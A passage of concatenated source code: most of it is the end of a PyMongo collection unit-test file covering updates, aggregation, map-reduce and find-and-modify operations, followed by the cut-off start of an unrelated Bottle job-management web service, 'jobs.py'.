self.assertEqual(1, db.test.count({"z": 1}))
self.assertEqual(0, db.test.count({"y": 1}))
self.assertEqual(db.test.find_one(id1)["z"], 1)
result = db.test.replace_one({"x": 2}, {"y": 2}, True)
self.assertTrue(isinstance(result, UpdateResult))
self.assertEqual(0, result.matched_count)
self.assertTrue(result.modified_count in (None, 0))
self.assertTrue(isinstance(result.upserted_id, ObjectId))
self.assertTrue(result.acknowledged)
self.assertEqual(1, db.test.count({"y": 2}))
db = db.client.get_database(db.name,
write_concern=WriteConcern(w=0))
result = db.test.replace_one({"x": 0}, {"y": 0})
self.assertTrue(isinstance(result, UpdateResult))
self.assertRaises(InvalidOperation, lambda: result.matched_count)
self.assertRaises(InvalidOperation, lambda: result.modified_count)
self.assertRaises(InvalidOperation, lambda: result.upserted_id)
self.assertFalse(result.acknowledged)
def test_update_one(self):
db = self.db
db.drop_collection("test")
self.assertRaises(ValueError,
lambda: db.test.update_one({}, {"x": 1}))
id1 = db.test.insert_one({"x": 5}).inserted_id
result = db.test.update_one({}, {"$inc": {"x": 1}})
self.assertTrue(isinstance(result, UpdateResult))
self.assertEqual(1, result.matched_count)
self.assertTrue(result.modified_count in (None, 1))
self.assertIsNone(result.upserted_id)
self.assertTrue(result.acknowledged)
self.assertEqual(db.test.find_one(id1)["x"], 6)
id2 = db.test.insert_one({"x": 1}).inserted_id
result = db.test.update_one({"x": 6}, {"$inc": {"x": 1}})
self.assertTrue(isinstance(result, UpdateResult))
self.assertEqual(1, result.matched_count)
self.assertTrue(result.modified_count in (None, 1))
self.assertIsNone(result.upserted_id)
self.assertTrue(result.acknowledged)
self.assertEqual(db.test.find_one(id1)["x"], 7)
self.assertEqual(db.test.find_one(id2)["x"], 1)
result = db.test.update_one({"x": 2}, {"$set": {"y": 1}}, True)
self.assertTrue(isinstance(result, UpdateResult))
self.assertEqual(0, result.matched_count)
self.assertTrue(result.modified_count in (None, 0))
self.assertTrue(isinstance(result.upserted_id, ObjectId))
self.assertTrue(result.acknowledged)
db = db.client.get_database(db.name,
write_concern=WriteConcern(w=0))
result = db.test.update_one({"x": 0}, {"$inc": {"x": 1}})
self.assertTrue(isinstance(result, UpdateResult))
self.assertRaises(InvalidOperation, lambda: result.matched_count)
self.assertRaises(InvalidOperation, lambda: result.modified_count)
self.assertRaises(InvalidOperation, lambda: result.upserted_id)
self.assertFalse(result.acknowledged)
def test_update_many(self):
db = self.db
db.drop_collection("test")
self.assertRaises(ValueError,
lambda: db.test.update_many({}, {"x": 1}))
db.test.insert_one({"x": 4, "y": 3})
db.test.insert_one({"x": 5, "y": 5})
db.test.insert_one({"x": 4, "y": 4})
result = db.test.update_many({"x": 4}, {"$set": {"y": 5}})
self.assertTrue(isinstance(result, UpdateResult))
self.assertEqual(2, result.matched_count)
self.assertTrue(result.modified_count in (None, 2))
self.assertIsNone(result.upserted_id)
self.assertTrue(result.acknowledged)
self.assertEqual(3, db.test.count({"y": 5}))
result = db.test.update_many({"x": 5}, {"$set": {"y": 6}})
self.assertTrue(isinstance(result, UpdateResult))
self.assertEqual(1, result.matched_count)
self.assertTrue(result.modified_count in (None, 1))
self.assertIsNone(result.upserted_id)
self.assertTrue(result.acknowledged)
self.assertEqual(1, db.test.count({"y": 6}))
result = db.test.update_many({"x": 2}, {"$set": {"y": 1}}, True)
self.assertTrue(isinstance(result, UpdateResult))
self.assertEqual(0, result.matched_count)
self.assertTrue(result.modified_count in (None, 0))
self.assertTrue(isinstance(result.upserted_id, ObjectId))
self.assertTrue(result.acknowledged)
db = db.client.get_database(db.name,
write_concern=WriteConcern(w=0))
result = db.test.update_many({"x": 0}, {"$inc": {"x": 1}})
self.assertTrue(isinstance(result, UpdateResult))
self.assertRaises(InvalidOperation, lambda: result.matched_count)
self.assertRaises(InvalidOperation, lambda: result.modified_count)
self.assertRaises(InvalidOperation, lambda: result.upserted_id)
self.assertFalse(result.acknowledged)
def test_update_with_invalid_keys(self):
self.db.drop_collection("test")
self.assertTrue(self.db.test.insert_one({"hello": "world"}))
doc = self.db.test.find_one()
doc['a.b'] = 'c'
expected = InvalidDocument
if client_context.version.at_least(2, 5, 4, -1):
expected = OperationFailure
# Replace
self.assertRaises(expected, self.db.test.replace_one,
{"hello": "world"}, doc)
# Upsert
self.assertRaises(expected, self.db.test.replace_one,
{"foo": "bar"}, doc, upsert=True)
# Check that the last two ops didn't actually modify anything
self.assertTrue('a.b' not in self.db.test.find_one())
# Modify shouldn't check keys...
self.assertTrue(self.db.test.update_one({"hello": "world"},
{"$set": {"foo.bar": "baz"}},
upsert=True))
# I know this seems like testing the server but I'd like to be notified
# by CI if the server's behavior changes here.
doc = SON([("$set", {"foo.bar": "bim"}), ("hello", "world")])
self.assertRaises(OperationFailure, self.db.test.update_one,
{"hello": "world"}, doc, upsert=True)
# This is going to cause keys to be checked and raise InvalidDocument.
# That's OK assuming the server's behavior in the previous assert
# doesn't change. If the behavior changes checking the first key for
# '$' in update won't be good enough anymore.
doc = SON([("hello", "world"), ("$set", {"foo.bar": "bim"})])
self.assertRaises(expected, self.db.test.replace_one,
{"hello": "world"}, doc, upsert=True)
# Replace with empty document
self.assertNotEqual(0,
self.db.test.replace_one(
{"hello": "world"}, {}).matched_count)
def test_acknowledged_delete(self):
db = self.db
db.drop_collection("test")
db.create_collection("test", capped=True, size=1000)
db.test.insert_one({"x": 1})
self.assertEqual(1, db.test.count())
# Can't remove from capped collection.
self.assertRaises(OperationFailure, db.test.delete_one, {"x": 1})
db.drop_collection("test")
db.test.insert_one({"x": 1})
db.test.insert_one({"x": 1})
self.assertEqual(2, db.test.delete_many({}).deleted_count)
self.assertEqual(0, db.test.delete_many({}).deleted_count)
def test_manual_last_error(self):
coll = self.db.get_collection("test", write_concern=WriteConcern(w=0))
coll.insert_one({"x": 1})
self.db.command("getlasterror", w=1, wtimeout=1)
def test_count(self):
db = self.db
db.drop_collection("test")
self.assertEqual(db.test.count(), 0)
db.test.insert_many([{}, {}])
self.assertEqual(db.test.count(), 2)
db.test.insert_many([{'foo': 'bar'}, {'foo': 'baz'}])
self.assertEqual(db.test.find({'foo': 'bar'}).count(), 1)
self.assertEqual(db.test.count({'foo': 'bar'}), 1)
self.assertEqual(db.test.find({'foo': re.compile(r'ba.*')}).count(), 2)
self.assertEqual(
db.test.count({'foo': re.compile(r'ba.*')}), 2)
def test_aggregate(self):
db = self.db
db.drop_collection("test")
db.test.insert_one({'foo': [1, 2]})
self.assertRaises(TypeError, db.test.aggregate, "wow")
pipeline = {"$project": {"_id": False, "foo": True}}
result = db.test.aggregate([pipeline], useCursor=False)
self.assertTrue(isinstance(result, CommandCursor))
self.assertEqual([{'foo': [1, 2]}], list(result))
# Test write concern.
if client_context.version.at_least(2, 6):
out_pipeline = [pipeline, {'$out': 'output-collection'}]
with self.write_concern_collection() as coll:
coll.aggregate(out_pipeline)
def test_aggregate_raw_bson(self):
db = self.db
db.drop_collection("test")
db.test.insert_one({'foo': [1, 2]})
self.assertRaises(TypeError, db.test.aggregate, "wow")
pipeline = {"$project": {"_id": False, "foo": True}}
result = db.get_collection(
'test',
codec_options=CodecOptions(document_class=RawBSONDocument)
).aggregate([pipeline], useCursor=False)
self.assertTrue(isinstance(result, CommandCursor))
first_result = next(result)
self.assertIsInstance(first_result, RawBSONDocument)
self.assertEqual([1, 2], list(first_result['foo']))
@client_context.require_version_min(2, 5, 1)
def test_aggregation_cursor_validation(self):
db = self.db
projection = {'$project': {'_id': '$_id'}}
cursor = db.test.aggregate([projection], cursor={})
self.assertTrue(isinstance(cursor, CommandCursor))
cursor = db.test.aggregate([projection], useCursor=True)
self.assertTrue(isinstance(cursor, CommandCursor))
@client_context.require_version_min(2, 5, 1)
def test_aggregation_cursor(self):
db = self.db
if client_context.has_secondaries:
# Test that getMore messages are sent to the right server.
db = self.client.get_database(
db.name,
read_preference=ReadPreference.SECONDARY,
write_concern=WriteConcern(w=self.w))
for collection_size in (10, 1000):
db.drop_collection("test")
db.test.insert_many([{'_id': i} for i in range(collection_size)])
expected_sum = sum(range(collection_size))
# Use batchSize to ensure multiple getMore messages
cursor = db.test.aggregate(
[{'$project': {'_id': '$_id'}}],
batchSize=5)
self.assertEqual(
expected_sum,
sum(doc['_id'] for doc in cursor))
# Test that batchSize is handled properly.
cursor = db.test.aggregate([], batchSize=5)
self.assertEqual(5, len(cursor._CommandCursor__data))
# Force a getMore
cursor._CommandCursor__data.clear()
next(cursor)
# startingFrom for a command cursor doesn't include the initial batch
# returned by the command.
self.assertEqual(5, cursor._CommandCursor__retrieved)
# batchSize - 1
self.assertEqual(4, len(cursor._CommandCursor__data))
# Exhaust the cursor. There shouldn't be any errors.
for doc in cursor:
pass
@client_context.require_version_min(2, 5, 1)
def test_aggregation_cursor_alive(self):
self.db.test.delete_many({})
self.db.test.insert_many([{} for _ in range(3)])
self.addCleanup(self.db.test.delete_many, {})
cursor = self.db.test.aggregate(pipeline=[], cursor={'batchSize': 2})
n = 0
while True:
cursor.next()
n += 1
if 3 == n:
self.assertFalse(cursor.alive)
break
self.assertTrue(cursor.alive)
@client_context.require_version_min(2, 5, 5)
@client_context.require_no_mongos
def test_parallel_scan(self):
db = self.db
db.drop_collection("test")
if client_context.has_secondaries:
# Test that getMore messages are sent to the right server.
db = self.client.get_database(
db.name,
read_preference=ReadPreference.SECONDARY,
write_concern=WriteConcern(w=self.w))
coll = db.test
coll.insert_many([{'_id': i} for i in range(8000)])
docs = []
threads = [threading.Thread(target=docs.extend, args=(cursor,))
for cursor in coll.parallel_scan(3)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertEqual(
set(range(8000)),
set(doc['_id'] for doc in docs))
@client_context.require_no_mongos
@client_context.require_version_min(3, 3, 10)
@client_context.require_test_commands
def test_parallel_scan_max_time_ms(self):
self.client.admin.command("configureFailPoint",
"maxTimeAlwaysTimeOut",
mode="alwaysOn")
try:
self.assertRaises(ExecutionTimeout,
self.db.test.parallel_scan,
3,
maxTimeMS=1)
finally:
self.client.admin.command("configureFailPoint",
"maxTimeAlwaysTimeOut",
mode="off")
def test_group(self):
db = self.db
db.drop_collection("test")
self.assertEqual([],
db.test.group([], {}, {"count": 0},
"function (obj, prev) { prev.count++; }"
))
db.test.insert_many([{"a": 2}, {"b": 5}, {"a": 1}])
self.assertEqual([{"count": 3}],
db.test.group([], {}, {"count": 0},
"function (obj, prev) { prev.count++; }"
))
self.assertEqual([{"count": 1}],
db.test.group([], {"a": {"$gt": 1}}, {"count": 0},
"function (obj, prev) { prev.count++; }"
))
db.test.insert_one({"a": 2, "b": 3})
self.assertEqual([{"a": 2, "count": 2},
{"a": None, "count": 1},
{"a": 1, "count": 1}],
db.test.group(["a"], {}, {"count": 0},
"function (obj, prev) { prev.count++; }"
))
# modifying finalize
self.assertEqual([{"a": 2, "count": 3},
{"a": None, "count": 2},
{"a": 1, "count": 2}],
db.test.group(["a"], {}, {"count": 0},
"function (obj, prev) "
"{ prev.count++; }",
"function (obj) { obj.count++; }"))
# returning finalize
self.assertEqual([2, 1, 1],
db.test.group(["a"], {}, {"count": 0},
"function (obj, prev) "
"{ prev.count++; }",
"function (obj) { return obj.count; }"))
# keyf
self.assertEqual([2, 2],
db.test.group("function (obj) { if (obj.a == 2) "
"{ return {a: true} }; "
"return {b: true}; }", {}, {"count": 0},
"function (obj, prev) "
"{ prev.count++; }",
"function (obj) { return obj.count; }"))
# no key
self.assertEqual([{"count": 4}],
db.test.group(None, {}, {"count": 0},
"function (obj, prev) { prev.count++; }"
))
self.assertRaises(OperationFailure, db.test.group,
[], {}, {}, "5 ++ 5")
def test_group_with_scope(self):
db = self.db
db.drop_collection("test")
db.test.insert_many([{"a": 1}, {"b": 1}])
reduce_function = "function (obj, prev) { prev.count += inc_value; }"
self.assertEqual(2, db.test.group([], {}, {"count": 0},
Code(reduce_function,
{"inc_value": 1}))[0]['count'])
self.assertEqual(4, db.test.group([], {}, {"count": 0},
Code(reduce_function,
{"inc_value": 2}))[0]['count'])
self.assertEqual(1,
db.test.group([], {}, {"count": 0},
Code(reduce_function,
{"inc_value": 0.5}))[0]['count'])
self.assertEqual(2, db.test.group(
[], {}, {"count": 0},
Code(reduce_function, {"inc_value": 1}))[0]['count'])
self.assertEqual(4, db.test.group(
[], {}, {"count": 0},
Code(reduce_function, {"inc_value": 2}))[0]['count'])
self.assertEqual(1, db.test.group(
[], {}, {"count": 0},
Code(reduce_function, {"inc_value": 0.5}))[0]['count'])
def test_large_limit(self):
db = self.db
db.drop_collection("test_large_limit")
db.test_large_limit.create_index([('x', 1)])
my_str = "mongomongo" * 1000
for i in range(2000):
doc = {"x": i, "y": my_str}
db.test_large_limit.insert_one(doc)
i = 0
y = 0
for doc in db.test_large_limit.find(limit=1900).sort([('x', 1)]):
i += 1
y += doc["x"]
self.assertEqual(1900, i)
self.assertEqual((1900 * 1899) / 2, y)
def test_find_kwargs(self):
db = self.db
db.drop_collection("test")
for i in range(10):
db.test.insert_one({"x": i})
self.assertEqual(10, db.test.count())
total = 0
for x in db.test.find({}, skip=4, limit=2):
total += x["x"]
self.assertEqual(9, total)
def test_rename(self):
db = self.db
db.drop_collection("test")
db.drop_collection("foo")
self.assertRaises(TypeError, db.test.rename, 5)
self.assertRaises(InvalidName, db.test.rename, "")
self.assertRaises(InvalidName, db.test.rename, "te$t")
self.assertRaises(InvalidName, db.test.rename, ".test")
self.assertRaises(InvalidName, db.test.rename, "test.")
self.assertRaises(InvalidName, db.test.rename, "tes..t")
self.assertEqual(0, db.test.count())
self.assertEqual(0, db.foo.count())
for i in range(10):
db.test.insert_one({"x": i})
self.assertEqual(10, db.test.count())
db.test.rename("foo")
self.assertEqual(0, db.test.count())
self.assertEqual(10, db.foo.count())
x = 0
for doc in db.foo.find():
self.assertEqual(x, doc["x"])
x += 1
db.test.insert_one({})
self.assertRaises(OperationFailure, db.foo.rename, "test")
db.foo.rename("test", dropTarget=True)
with self.write_concern_collection() as coll:
coll.rename('foo')
def test_find_one(self):
db = self.db
db.drop_collection("test")
_id = db.test.insert_one({"hello": "world", "foo": "bar"}).inserted_id
self.assertEqual("world", db.test.find_one()["hello"])
self.assertEqual(db.test.find_one(_id), db.test.find_one())
self.assertEqual(db.test.find_one(None), db.test.find_one())
self.assertEqual(db.test.find_one({}), db.test.find_one())
self.assertEqual(db.test.find_one({"hello": "world"}),
db.test.find_one())
self.assertTrue("hello" in db.test.find_one(projection=["hello"]))
self.assertTrue("hello" not in db.test.find_one(projection=["foo"]))
self.assertEqual(["_id"], list(db.test.find_one(projection=[])))
self.assertEqual(None, db.test.find_one({"hello": "foo"}))
self.assertEqual(None, db.test.find_one(ObjectId()))
def test_find_one_non_objectid(self):
db = self.db
db.drop_collection("test")
db.test.insert_one({"_id": 5})
self.assertTrue(db.test.find_one(5))
self.assertFalse(db.test.find_one(6))
def test_find_one_with_find_args(self):
db = self.db
db.drop_collection("test")
db.test.insert_many([{"x": i} for i in range(1, 4)])
self.assertEqual(1, db.test.find_one()["x"])
self.assertEqual(2, db.test.find_one(skip=1, limit=2)["x"])
def test_find_with_sort(self):
db = self.db
db.drop_collection("test")
db.test.insert_many([{"x": 2}, {"x": 1}, {"x": 3}])
self.assertEqual(2, db.test.find_one()["x"])
self.assertEqual(1, db.test.find_one(sort=[("x", 1)])["x"])
self.assertEqual(3, db.test.find_one(sort=[("x", -1)])["x"])
def to_list(things):
return [thing["x"] for thing in things]
self.assertEqual([2, 1, 3], to_list(db.test.find()))
self.assertEqual([1, 2, 3], to_list(db.test.find(sort=[("x", 1)])))
self.assertEqual([3, 2, 1], to_list(db.test.find(sort=[("x", -1)])))
self.assertRaises(TypeError, db.test.find, sort=5)
self.assertRaises(TypeError, db.test.find, sort="hello")
self.assertRaises(ValueError, db.test.find, sort=["hello", 1])
# TODO doesn't actually test functionality, just that it doesn't blow up
def test_cursor_timeout(self):
list(self.db.test.find(no_cursor_timeout=True))
list(self.db.test.find(no_cursor_timeout=False))
def test_exhaust(self):
if is_mongos(self.db.client):
self.assertRaises(InvalidOperation,
self.db.test.find,
cursor_type=CursorType.EXHAUST)
return
# Limit is incompatible with exhaust.
self.assertRaises(InvalidOperation,
self.db.test.find,
cursor_type=CursorType.EXHAUST,
limit=5)
cur = self.db.test.find(cursor_type=CursorType.EXHAUST)
self.assertRaises(InvalidOperation, cur.limit, 5)
cur = self.db.test.find(limit=5)
self.assertRaises(InvalidOperation, cur.add_option, 64)
cur = self.db.test.find()
cur.add_option(64)
self.assertRaises(InvalidOperation, cur.limit, 5)
self.db.drop_collection("test")
# Insert enough documents to require more than one batch
self.db.test.insert_many([{'i': i} for i in range(150)])
client = rs_or_single_client(maxPoolSize=1)
socks = get_pool(client).sockets
# Make sure the socket is returned after exhaustion.
cur = client[self.db.name].test.find(cursor_type=CursorType.EXHAUST)
next(cur)
self.assertEqual(0, len(socks))
for _ in cur:
pass
self.assertEqual(1, len(socks))
# Same as previous but don't call next()
for _ in client[self.db.name].test.find(cursor_type=CursorType.EXHAUST):
pass
self.assertEqual(1, len(socks))
# If the Cursor instance is discarded before being
# completely iterated we have to close and
# discard the socket.
cur = client[self.db.name].test.find(cursor_type=CursorType.EXHAUST)
next(cur)
self.assertEqual(0, len(socks))
if sys.platform.startswith('java') or 'PyPy' in sys.version:
# Don't wait for GC or use gc.collect(), it's unreliable.
cur.close()
cur = None
# The socket should be discarded.
self.assertEqual(0, len(socks))
def test_distinct(self):
self.db.drop_collection("test")
test = self.db.test
test.insert_many([{"a": 1}, {"a": 2}, {"a": 2}, {"a": 2}, {"a": 3}])
distinct = test.distinct("a")
distinct.sort()
self.assertEqual([1, 2, 3], distinct)
distinct = test.find({'a': {'$gt': 1}}).distinct("a")
distinct.sort()
self.assertEqual([2, 3], distinct)
distinct = test.distinct('a', {'a': {'$gt': 1}})
distinct.sort()
self.assertEqual([2, 3], distinct)
self.db.drop_collection("test")
test.insert_one({"a": {"b": "a"}, "c": 12})
test.insert_one({"a": {"b": "b"}, "c": 12})
test.insert_one({"a": {"b": "c"}, "c": 12})
test.insert_one({"a": {"b": "c"}, "c": 12})
distinct = test.distinct("a.b")
distinct.sort()
self.assertEqual(["a", "b", "c"], distinct)
def test_query_on_query_field(self):
self.db.drop_collection("test")
self.db.test.insert_one({"query": "foo"})
self.db.test.insert_one({"bar": "foo"})
self.assertEqual(1,
self.db.test.find({"query": {"$ne": None}}).count())
self.assertEqual(1,
len(list(self.db.test.find({"query": {"$ne": None}})))
)
def test_min_query(self):
self.db.drop_collection("test")
self.db.test.insert_many([{"x": 1}, {"x": 2}])
self.db.test.create_index("x")
self.assertEqual(1, len(list(self.db.test.find({"$min": {"x": 2},
"$query": {}}))))
self.assertEqual(2, self.db.test.find({"$min": {"x": 2},
"$query": {}})[0]["x"])
def test_numerous_inserts(self):
# Ensure we don't exceed server's 1000-document batch size limit.
self.db.test.drop()
n_docs = 2100
self.db.test.insert_many([{} for _ in range(n_docs)])
self.assertEqual(n_docs, self.db.test.count())
self.db.test.drop()
def test_map_reduce(self):
db = self.db
db.drop_collection("test")
db.test.insert_one({"id": 1, "tags": ["dog", "cat"]})
db.test.insert_one({"id": 2, "tags": ["cat"]})
db.test.insert_one({"id": 3, "tags": ["mouse", "cat", "dog"]})
db.test.insert_one({"id": 4, "tags": []})
map = Code("function () {"
" this.tags.forEach(function(z) {"
" emit(z, 1);"
" });"
"}")
reduce = Code("function (key, values) {"
" var total = 0;"
" for (var i = 0; i < values.length; i++) {"
" total += values[i];"
" }"
" return total;"
"}")
result = db.test.map_reduce(map, reduce, out='mrunittests')
self.assertEqual(3, result.find_one({"_id": "cat"})["value"])
self.assertEqual(2, result.find_one({"_id": "dog"})["value"])
self.assertEqual(1, result.find_one({"_id": "mouse"})["value"])
db.test.insert_one({"id": 5, "tags": ["hampster"]})
result = db.test.map_reduce(map, reduce, out='mrunittests')
self.assertEqual(1, result.find_one({"_id": "hampster"})["value"])
db.test.delete_one({"id": 5})
result = db.test.map_reduce(map, reduce,
out={'merge': 'mrunittests'})
self.assertEqual(3, result.find_one({"_id": "cat"})["value"])
self.assertEqual(1, result.find_one({"_id": "hampster"})["value"])
result = db.test.map_reduce(map, reduce,
out={'reduce': 'mrunittests'})
self.assertEqual(6, result.find_one({"_id": "cat"})["value"])
self.assertEqual(4, result.find_one({"_id": "dog"})["value"])
self.assertEqual(2, result.find_one({"_id": "mouse"})["value"])
self.assertEqual(1, result.find_one({"_id": "hampster"})["value"])
result = db.test.map_reduce(
map,
reduce,
out={'replace': 'mrunittests'}
)
self.assertEqual(3, result.find_one({"_id": "cat"})["value"])
self.assertEqual(2, result.find_one({"_id": "dog"})["value"])
self.assertEqual(1, result.find_one({"_id": "mouse"})["value"])
result = db.test.map_reduce(map, reduce,
out=SON([('replace', 'mrunittests'),
('db', 'mrtestdb')
]))
self.assertEqual(3, result.find_one({"_id": "cat"})["value"])
self.assertEqual(2, result.find_one({"_id": "dog"})["value"])
self.assertEqual(1, result.find_one({"_id": "mouse"})["value"])
self.client.drop_database('mrtestdb')
full_result = db.test.map_reduce(map, reduce,
out='mrunittests', full_response=True)
self.assertEqual(6, full_result["counts"]["emit"])
result = db.test.map_reduce(map, reduce, out='mrunittests', limit=2)
self.assertEqual(2, result.find_one({"_id": "cat"})["value"])
self.assertEqual(1, result.find_one({"_id": "dog"})["value"])
self.assertEqual(None, result.find_one({"_id": "mouse"}))
result = db.test.map_reduce(map, reduce, out={'inline': 1})
self.assertTrue(isinstance(result, dict))
self.assertTrue('results' in result)
self.assertTrue(result['results'][1]["_id"] in ("cat",
"dog",
"mouse"))
result = db.test.inline_map_reduce(map, reduce)
self.assertTrue(isinstance(result, list))
self.assertEqual(3, len(result))
self.assertTrue(result[1]["_id"] in ("cat", "dog", "mouse"))
full_result = db.test.inline_map_reduce(map, reduce,
full_response=True)
self.assertEqual(6, full_result["counts"]["emit"])
with self.write_concern_collection() as coll:
coll.map_reduce(map, reduce, 'output')
def test_messages_with_unicode_collection_names(self):
db = self.db
db[u"Employés"].insert_one({"x": 1})
db[u"Employés"].replace_one({"x": 1}, {"x": 2})
db[u"Employés"].delete_many({})
db[u"Employés"].find_one()
list(db[u"Employés"].find())
def test_drop_indexes_non_existent(self):
self.db.drop_collection("test")
self.db.test.drop_indexes()
# This is really a bson test but easier to just reproduce it here...
# (Shame on me)
def test_bad_encode(self):
c = self.db.test
c.drop()
self.assertRaises(InvalidDocument, c.insert_one, {"x": c})
class BadGetAttr(dict):
def __getattr__(self, name):
pass
bad = BadGetAttr([('foo', 'bar')])
c.insert_one({'bad': bad})
self.assertEqual('bar', c.find_one()['bad']['foo'])
def test_find_one_and(self):
c = self.db.test
c.drop()
c.insert_one({'_id': 1, 'i': 1})
self.assertEqual({'_id': 1, 'i': 1},
c.find_one_and_update({'_id': 1}, {'$inc': {'i': 1}}))
self.assertEqual({'_id': 1, 'i': 3},
c.find_one_and_update(
{'_id': 1}, {'$inc': {'i': 1}},
return_document=ReturnDocument.AFTER))
self.assertEqual({'_id': 1, 'i': 3},
c.find_one_and_delete({'_id': 1}))
self.assertEqual(None, c.find_one({'_id': 1}))
self.assertEqual(None,
c.find_one_and_update({'_id': 1}, {'$inc': {'i': 1}}))
self.assertEqual({'_id': 1, 'i': 1},
c.find_one_and_update(
{'_id': 1}, {'$inc': {'i': 1}},
return_document=ReturnDocument.AFTER,
upsert=True))
self.assertEqual({'_id': 1, 'i': 2},
c.find_one_and_update(
{'_id': 1}, {'$inc': {'i': 1}},
return_document=ReturnDocument.AFTER))
self.assertEqual({'_id': 1, 'i': 3},
c.find_one_and_replace(
{'_id': 1}, {'i': 3, 'j': 1},
projection=['i'],
return_document=ReturnDocument.AFTER))
self.assertEqual({'i': 4},
c.find_one_and_update(
{'_id': 1}, {'$inc': {'i': 1}},
projection={'i': 1, '_id': 0},
return_document=ReturnDocument.AFTER))
c.drop()
for j in range(5):
c.insert_one({'j': j, 'i': 0})
sort = [('j', DESCENDING)]
self.assertEqual(4, c.find_one_and_update({},
{'$inc': {'i': 1}},
sort=sort)['j'])
def test_find_one_and_write_concern(self):
listener = EventListener()
saved_listeners = monitoring._LISTENERS
monitoring._LISTENERS = monitoring._Listeners([], [], [], [])
db = single_client(event_listeners=[listener])[self.db.name]
# non-default WriteConcern.
c_w0 = db.get_collection(
'test', write_concern=WriteConcern(w=0))
# default WriteConcern.
c_default = db.get_collection('test', write_concern=WriteConcern())
results = listener.results
# Authenticate the client and throw out auth commands from the listener.
db.command('ismaster')
results.clear()
try:
if client_context.version.at_least(3, 1, 9, -1):
c_w0.find_and_modify(
{'_id': 1}, {'$set': {'foo': 'bar'}})
self.assertEqual(
{'w': 0}, results['started'][0].command['writeConcern'])
results.clear()
c_w0.find_one_and_update(
{'_id': 1}, {'$set': {'foo': 'bar'}})
self.assertEqual(
{'w': 0}, results['started'][0].command['writeConcern'])
results.clear()
c_w0.find_one_and_replace({'_id': 1}, {'foo': 'bar'})
self.assertEqual(
{'w': 0}, results['started'][0].command['writeConcern'])
results.clear()
c_w0.find_one_and_delete({'_id': 1})
self.assertEqual(
{'w': 0}, results['started'][0].command['writeConcern'])
results.clear()
# Test write concern errors.
if client_context.is_rs:
c_wc_error = db.get_collection(
'test',
write_concern=WriteConcern(
w=len(client_context.nodes) + 1))
self.assertRaises(
WriteConcernError,
c_wc_error.find_and_modify,
{'_id': 1}, {'$set': {'foo': 'bar'}})
self.assertRaises(
WriteConcernError,
c_wc_error.find_one_and_update,
{'_id': 1}, {'$set': {'foo': 'bar'}})
self.assertRaises(
WriteConcernError,
c_wc_error.find_one_and_replace,
{'w': 0}, results['started'][0].command['writeConcern'])
self.assertRaises(
WriteConcernError,
c_wc_error.find_one_and_delete,
{'w': 0}, results['started'][0].command['writeConcern'])
results.clear()
else:
c_w0.find_and_modify(
{'_id': 1}, {'$set': {'foo': 'bar'}})
self.assertNotIn('writeConcern', results['started'][0].command)
results.clear()
c_w0.find_one_and_update(
{'_id': 1}, {'$set': {'foo': 'bar'}})
self.assertNotIn('writeConcern', results['started'][0].command)
results.clear()
c_w0.find_one_and_replace({'_id': 1}, {'foo': 'bar'})
self.assertNotIn('writeConcern', results['started'][0].command)
results.clear()
c_w0.find_one_and_delete({'_id': 1})
self.assertNotIn('writeConcern', results['started'][0].command)
results.clear()
c_default.find_and_modify({'_id': 1}, {'$set': {'foo': 'bar'}})
self.assertNotIn('writeConcern', results['started'][0].command)
results.clear()
c_default.find_one_and_update({'_id': 1}, {'$set': {'foo': 'bar'}})
self.assertNotIn('writeConcern', results['started'][0].command)
results.clear()
c_default.find_one_and_replace({'_id': 1}, {'foo': 'bar'})
self.assertNotIn('writeConcern', results['started'][0].command)
results.clear()
c_default.find_one_and_delete({'_id': 1})
self.assertNotIn('writeConcern', results['started'][0].command)
results.clear()
finally:
monitoring._LISTENERS = saved_listeners
def test_find_with_nested(self):
c = self.db.test
c.drop()
c.insert_many([{'i': i} for i in range(5)]) # [0, 1, 2, 3, 4]
self.assertEqual(
[2],
[i['i'] for i in c.find({
'$and': [
{
# This clause gives us [1,2,4]
'$or': [
{'i': {'$lte': 2}},
{'i': {'$gt': 3}},
],
},
{
# This clause gives us [2,3]
'$or': [
{'i': 2},
{'i': 3},
]
},
]
})]
)
self.assertEqual(
[0, 1, 2],
[i['i'] for i in c.find({
'$or': [
{
# This clause gives us [2]
'$and': [
{'i': {'$gte': 2}},
{'i': {'$lt': 3}},
],
},
{
# This clause gives us [0,1]
'$and': [
{'i': {'$gt': -100}},
{'i': {'$lt': 2}},
]
},
]
})]
)
def test_find_regex(self):
c = self.db.test
c.drop()
c.insert_one({'r': re.compile('.*')})
self.assertTrue(isinstance(c.find_one()['r'], Regex))
for doc in c.find():
self.assertTrue(isinstance(doc['r'], Regex))
def test_find_command_generation(self):
cmd = _gen_find_command(
'coll', {'$query': {'foo': 1}, '$dumb': 2}, None, 0, 0, 0, None)
self.assertEqual(
cmd.to_dict(),
SON([('find', 'coll'),
('$dumb', 2),
('filter', {'foo': 1})]).to_dict())
if __name__ == "__main__":
unittest.main()
|
jobs.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from bottle import Bottle, request, template, abort, static_file
import os
import uuid
import sh
import json
import yaml
from datetime import datetime
import time
import threading
import functools
import psutil
import shutil
import adb
app = Bottle()
app.config.setdefault('jobs.path', '/home/pi/jobs')
app.config.setdefault('jobs.init_script', '.init.yml')
jobs = [] # we are using memory obj, so we MUST get ONE app instance running.
_lock = threading.Lock()
def lock(fn):
global _lock
@functools.wraps(fn)
def wrapper(*args, **kwargs):
_lock.acquire()
try:
return fn(*args, **kwargs)
except:
raise
finally:
_lock.release()
return wrapper
@app.get("/")
@lock
def all_jobs():
global jobs
job_path = app.config.get('jobs.path')
reverse = get_boolean(request.params.get('reverse', 'false'))
all = get_boolean(request.params.get('all', 'false'))
result = {}
if all:
result['all'] = []
for dirname in os.listdir(job_path):
json_file = os.path.join(job_path, dirname, 'job.json')
if os.path.isfile(json_file):
with open(json_file) as f:
result['all'].append(json.load(f))
result['jobs'] = [job['job_info'] for job in jobs]
for key in result: # sort
result[key] = sorted(result[key], key=lambda x: float(x['started_at']), reverse=reverse)
return result
@app.post("/")
def create_job_without_id():
job_id = request.params.get("job_id") if "job_id" in request.params else next_job_id()
return create_job(job_id, "%s/%s" % (refine_url(request.url), job_id))
@app.post("/<job_id>")
def create_job_with_id(job_id):
return create_job(job_id, refine_url(request.url))
@lock
def create_job(job_id, job_url):
repo = request.json.get('repo')
if repo is None:
abort(400, 'The "repo" is mandatory for creating a new job!')
exclusive = get_boolean(request.json.get('exclusive', True))
env = request.json.get('env', {})
env.setdefault('ANDROID_SERIAL', 'no_device')
global jobs
